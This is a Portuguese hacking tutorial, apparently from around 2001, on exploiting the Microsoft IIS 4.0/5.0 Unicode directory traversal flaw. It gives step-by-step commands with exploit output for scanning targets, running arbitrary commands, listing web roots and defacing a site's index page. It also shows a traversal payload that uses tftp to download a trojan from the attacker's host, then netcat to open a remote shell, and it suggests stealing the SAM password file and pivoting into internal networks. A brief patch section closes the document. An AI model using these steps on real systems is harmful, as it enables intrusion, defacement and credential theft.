Desenvolvido por: 

Bruno Taranto Alvim 

UIN: 58276032

Thiago Taranto Alvim 

UIN: 3614747

:::::::::::::::::::: OBS ::::::::::::::::::::

Todo o tipo de informação publicada no site inclusive esse paper são de inteira responsabilidade do usuário final. A HISS não poderá ser responsabilizada pelos danos diretos ou indiretos causados pela má utilização destes recursos e das informações contidas aqui neste paper. Temos como objetivo difundir a informação para que administradores, security officers e outros tenham conhecimento do que rola no UNDERGROUND.

:::::::::::::::::::: OBS :::::::::::::::::::: 


Tentaremos aqui desenvolver um paper explicando passo-à-passo de como um "hacker" faz para obter acesso num servidor rodando WindowsNT Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal vulnerável e como corrigir essa vulnerabilidade. 



Infelizmente no Brasil MUITAS empresas ainda não tem a consciência de que precisam ter uma equipe de Security Officers em seus estabelecimentos. Todas ainda acham que os administradores tem que cuidar da parte de segurança, o que não é verdade. 



Segue abaixo as versões dos Sistemas Operacionais e Programas Vulneráveis. 

Vulnerável: 

Microsoft IIS 5.0 

+ Microsoft Windows NT 2000 

Microsoft IIS 4.0 

- Microsoft Windows NT 4.0 

+ Microsoft BackOffice 4.5 

- Microsoft Windows NT 4.0 

+ Microsoft BackOffice 4.0 

- Microsoft Windows NT 4.0 



Vamos ao que interessa..... 



:::::::: INDICE :::::::: 

:::::::: 1 Procurar por um host vulnerável. 

:::::::: 2 Testar se o host é realmente vulnerável. 

:::::::: 2.1 Fazer um scanner no host alvo. 

:::::::: 2.2 Testar o exploit no host alvo antes mesmo de verificar se ele está vulnerável ou não. 

:::::::: 3 Listar os arquivos e pastas contidos no servidor vulnerável. 

:::::::: 4 Alterar o conteúdo do site do host vulnerável. 

:::::::: 5 TÉCNICAS DE HAXORS. ;-) 

:::::::: 6 AGORA VOCÊ É UM HACKER. OU NÃO? :D 

:::::::: 7 MAIS EXPLOITS. 

:::::::: 8 CORREÇÃO. 

:::::::: INDICE :::::::: 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 1 Procurar por um host vulnerável. 

::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Geralmente os hosts mais procurados são os mais conhecidos, como sites do governo e empresas nacionalmente e mundialmente conhecidas. 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 2 Testar se o host é realmente vulnerável. 

:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

Existem duas maneiras báscias. 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 2.1 Fazer um scanner no host alvo. 

:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

Existem scanners que vasculham servidores e serviços que estão sendo executados. Esses scanners verificam se há algum serviço vulnerável, que ainda não foi corrigido. Para testar essa vulnerabilidade existem scanners tanto para windows quanto pra linux.



Para windows você pode obter o SSS - Security Shadow Scanner e para linux um scanner feito perl que quando encontra um HOST vulnerável ele inidica o url de onde pode-se obter o exploit para explorar essa vulnerabilidade. 



Segue abaixo como usá-los: 

- SSS (Security Shadow Scanner) Não há mistério de como utilizá-lo. Basta preencher o campo com o IP ou HOST do alvo e iniciar o "scanneamento". Quando encontrar ele colocará em vermelho um aviso disendo que o HOST está vulnerável ao msdac.dll. 





- unicheck.pl - Veja o que acontece quando ele acha um HOST vulnerável. 





#akira:/home/bruno/unicode/Scanners# perl unicheck.pl XXX.XXX.XXX.XXX:80 

#Trying..................... 

# 

#THIS HOST IS VULNERABLE :-) 

#USE unicodexecute2.pl from 

#http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl 



- Pode ver que ele avisa que o host é vulnerável. THIS HOST IS VULNERABLE :-) 



- Avisa onde encotrar o exploit para explorar a vulnerabilidade. http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl 



:::::::::::::::::::: OBS :::::::::::::::::::: 

Agora não precisará achar um host vulnerável para encontrar o exploit para explorar essa vulnerabilidade. :-) 

:::::::::::::::::::: OBS :::::::::::::::::::: 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 2.2 Testar o exploit no host alvo antes mesmo de verificar se ele está vulnerável ou não. Isso é muito simples. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Agora iremos testar o exploit no nosso host alvo.





#akira:/home/bruno/unicode/Exploits# perl unicodexecute2.pl www.host-alvo.com.br:80 "dir c:inetpub" 

#Sensepost.exe found - Executing [dir c:inetpub] on 

#www.host-alvo.com.br:80 

#HTTP/1.1 200 OK 

#Server: Microsoft-IIS/5.0 

#Date: Fri, 12 Jan 2001 14:06:24 GMT 

#Content-Type: application/octet-stream 

#Volume in drive C has no label. 

#Volume Serial Number is 543D-8959 

#Directory of c:inetpub 

#01/11/2001 07:08p dir .

#01/11/2001 07:08p dir .. 

#01/11/2001 03:29p dir AdminScripts 

#01/11/2001 05:33p dir mailroot 

#01/12/2001 11:36a dir scripts 

#01/11/2001 05:33p dir wwwroot 

# 0 File(s) 0 bytes 

# 6 Dir(s) 1,067,216,896 bytes free 



Como pode ver acima, foi listado os diretórios dentro do diretório c:inetpub. Assim o "hacker" tem acesso à todo o seus arquivos, podendo assim alterar o site da empresa que infelizmente não tem uma equipe separada da equipe de administração responsável pela segurança da empresa, que não só se limita à segurança virtual. Como o "hacker" pode ler o diretório "c:inetpub" ele também pode ter acesso ao diretório padrão do website "c:inetpubwwwroot" ou outro diretório que hospeda os arquivos do site da empresa como pode ver abaixo. 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 3 Listar os arquivos e pastas contidos no servidor vulnerável 

:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

Iremos listar todos os arquivos e diretórios dentro de uma determinada pasta. 





#akira:/home/bruno/unicode/Exploits# perl xpu.pl www.host-alvo.com.br:80 "dir c:inetpubwwwroot" 

#Sensepost.exe found - Executing [dir c:inetpubwwwroot] on www.host-alvo.com.br:80 

#HTTP/1.1 200 OK 

#Server: Microsoft-IIS/5.0 

#Date: Fri, 12 Jan 2001 13:52:52 GMT 

#Content-Type: application/octet-stream 

#Volume in drive C has no label. 

#Volume Serial Number is 543D-8959 

# 

# Directory of c:inetpubwwwroot 

# 

#01/11/2001 05:33p dir . 

#01/11/2001 05:33p dir .. 

#06/03/1999 09:13p 342 aveia.gif 

#06/03/1999 09:13p 1,736 index.asp 

#01/11/2001 05:33p dir imagens 

#09/22/1999 12:58p 7,240 start.asp 

#06/03/1999 09:13p 356 manta.gif 

#06/03/1999 09:13p 2,806 pagao.gif 

#01/11/2001 05:33p 2,497 post.html 

#06/03/1999 09:13p 1,046 printing.gif 

#06/03/1999 09:13p 1,577 war.gif 

#06/03/1999 09:13p 1,182 woowoo.gif 

#06/03/1999 09:13p 4,670 zetarock.gif 

#01/11/2001 05:33p dir _private 

#01/11/2001 05:33p 1,759 _vti_inf.html 

#01/11/2001 05:33p dir _vti_log 

# 11 File(s) 25,211 bytes 

# 5 Dir(s) 1,066,082,304 bytes free 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 4 Alterar o conteúdo do site do host vulnerável. 

:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 



#akira:/home/bruno/unicode/Exploits# perl unicodexecute.pl www.host-alvo.com.br:80 ''echo SITE HACKED BY HACKER GROUP!! > c:inetpubwwwrootindex.htm'' 



Pronto... agora você alterou o site da empresa que encontrou vulnerável. Quando for acessar o site da empresa que encontrou vulnerável você encontrará a seguinte mensagem no site: 



" SITE HACKED BY HACKER GROUP! " 



É assim que praticamente o mundo inteiro está sendo invadido. :-) 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 5 TÉCNICAS DE HAXORS 

:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

Bom... agora varia de pessoa para pessoa, conheceimento para conhecimento, criatividade para criatividade. O jeito de como você pode obter maiores informações a partir da exploração da vulnerabilidade do unicode só dependerá de você. 



Para adiantar o seu lado, vamos adiantar alguma coisa. Com o acesso já garantido ao servidor você poderá fazer o que bem entende. Geralmente os "hackers" do Brasil se contentam em alterar a pagina e esquecer de "backdoorizar" as máquinas que eles conseguem invadir. De certa forma isso é muito bom, pois o que parece é que eles querem somente manifestar o seu descontentamento com o governo e a administração que o Brasil tem. Não que isso seja certo ou que concordamos com o que eles fazem. Infelizmente as pessoas ainda não tem conhecimento do que acontece e o que realmente é o underground e mesmo o que é um HACKER no sentido profundo.



Para você obter um maior acesso à rede, ou seja, conseguir acesso à outras máquinas, outros tipos de acessos, abrir um terminal remoto e até mesmo continuar tendo acesso à máquina, você precisa fazer algumas coisas, mesmo porque o servidor não ficará vulnerável para sempre. 



Você pode utilizar ferramentas que já vem instaladas por default (padrão) no Windows NT e 2000 para "facilitar" a sua vida. A dica que daremos aqui é utilizar o TFTP para poder abrir um terminal remoto posteriormente e continuar tendo acesso à máquina mesmo depois de sua correção. 



/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+ip.de.onde.esta.o.trojan+GET+trojan.exe+c:winntsystem32 rojan.exe 



agora rode o trojan com: 



/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe 



Bom... 

Agora você instalou o nc no servidor, poderá abrir um terminal remoto no Windows NT, tendo acesso completo ao sistema. 



Como foi dito antes, depende de você continuar tendo acesso ao servidor. E essas técnicas estão sendo aprimoradas a cada dia. Você acha que pode conseguir ter acesso ao arquivo SAM? Você pode descriptografar as senhas dos usuários? Você pode utilizar o terminal que você abriu e tentar ter acesso à outras máquinas para não haver um reastreamento direto para sua máquina?Você pode conseguir acesso à rede interna (10.0.0.0 por exemplo) se houver? Você pode sniffar a rede a partir dessa máquina e obter acesso às outras máquinas? 



Como pode ver... pode se fazer MUITA coisa além de modificar uma página apartir de um bug que CENTENAS de servidores ainda continuam vulneráveis por todo o mundo. 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 6 AGORA VOCÊ É UM HACKER. OU NÃO? 

:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

Você se considera um hacker? 

Bom... sem mais. 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 7 MAIS EXPLOITS. 

:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

Mais exploits: 

iis-zang.c 

iis-zang.exe 

iis-zang.obsd 

iis-zang.linux 

unicodecheck.pl 

unicodexecute.pl 

unicodexecute2.pl 



:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

:::::::: 7 CORREÇÃO. 

:::::::::::::::::::::::::::::::::::::::::::::::::::::::: 

Contratar um Security Officer para cuidar da segurança da sua empresa. 



Se manter o mais atualizado possível. 



Internet Informatio Server 4.0 

http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp 



Internet Informatio Server 5.0 

http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp